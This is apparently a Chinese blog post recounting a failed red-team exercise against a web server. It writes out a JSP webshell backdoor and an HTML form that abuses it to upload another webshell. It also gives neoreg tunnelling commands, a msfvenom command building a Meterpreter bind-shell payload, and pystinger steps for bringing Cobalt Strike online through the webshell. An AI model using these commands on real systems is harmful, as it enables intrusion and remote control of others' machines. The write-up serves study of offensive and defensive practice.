记一次失败的打点

简介: 记一次失败的打点

背景


在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。


上传webshell


在web目录发现了一个已存在木马xx.jsp


<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个html表单来上传我们的自己木马


<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">      <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>    <input type=submit value="提交">  </form>

目标不出网,无法外联


neoreg


还原大致流程


生成neoreg


py -2 neoreg.py generate -k password


上传&验证


py -2 neoreg.py -k password -u http://192.168.11.132/3.php`

msf上线


msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=9001 -f exe -o reverse.exe

gedit /etc/proxychains4.conf


bd96902dccc9a0c18951361d921ad0be_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



proxychains4 msfconsole


97ab06f717b7f44c95119465262494fe_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


0458455f8bbc5b2342e6870ddcfb0b53_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


CS上线

pystinger


蚁剑上传proxy.phpstinger_server.exe并执行  start stinger_server.exe



攻击机执行


stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000


9013c3ca539d454049c855ae346f3ad2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


设置监听


2ea055c423a37255c418e141845493cf_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


上线


2ed2eaf610386f206137f593df9085cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



结束语


最后不幸被蓝队发现,痛失权限,打点失败。


相关文章
FeignClient打印请求失败的日志,打印所有feignCliet接口请求失败的错误日志,方便排查原因
FeignClient打印请求失败的日志,打印所有feignCliet接口请求失败的错误日志,方便排查原因
271 0
|
2月前
|
测试技术 开发工具 git
写了BUG还想跑——闲鱼异常日志问题自动追踪-定位-分发机制
为了高效地发现、定位和解决预发问题,闲鱼团队研发了一套异常日志问题自动追踪-定位-分发机制。这套机制通过自动化手段,实现了异常日志的定时扫描、精准定位和自动分发,显著降低了开发和测试的成本,提高了问题解决的效率。
103 15
写了BUG还想跑——闲鱼异常日志问题自动追踪-定位-分发机制
|
4月前
|
JSON 缓存 fastjson
一行日志引发的系统异常
本文记录了一行日志引发的系统异常以及作者解决问题的思路。
|
5月前
|
消息中间件 负载均衡 调度
异步任务处理系统问题之自动重试是如何在Level 3的系统中实现的问题如何解决
异步任务处理系统问题之自动重试是如何在Level 3的系统中实现的问题如何解决
|
5月前
|
iOS开发 MacOS
解决CocoaPods安装卡住反应慢或失败
解决CocoaPods安装卡住反应慢或失败
1014 4
|
7月前
|
监控 关系型数据库 MySQL
Flink实现实时异常登陆监控(两秒内多次登陆失败进行异常行为标记)
Flink实现实时异常登陆监控(两秒内多次登陆失败进行异常行为标记)
124 1
|
Android开发
为什么会触发ANR,从源码中扒一扒
为什么会触发ANR,从源码中扒一扒
113 0
实时错误——381
在敲机房的过程中,我相信大家都有遇到了这种问题<下标越线>,乍一看也很蒙圈,查看附近的代码和控件没有发现错误出现在哪,进行调试之后蹦到了我的代码页面上
79 0
|
Kubernetes 网络协议 Cloud Native
【直播回放】DeepFlow AutoLogging:自动采集应用调用日志和流日志
第九期“原力释放 云原生可观测性分享会”云杉网络 产品专家 李倩分享了《DeepFlow AutoLogging:自动采集应用调用日志和流日志》主题, DeepFlow AutoLogging 可以自动采集网络流日志,并提供丰富的性能指标和精细至每包的TCP时序日志,与应用调用日志结合提供完整的全栈回溯能力。
346 0
【直播回放】DeepFlow AutoLogging:自动采集应用调用日志和流日志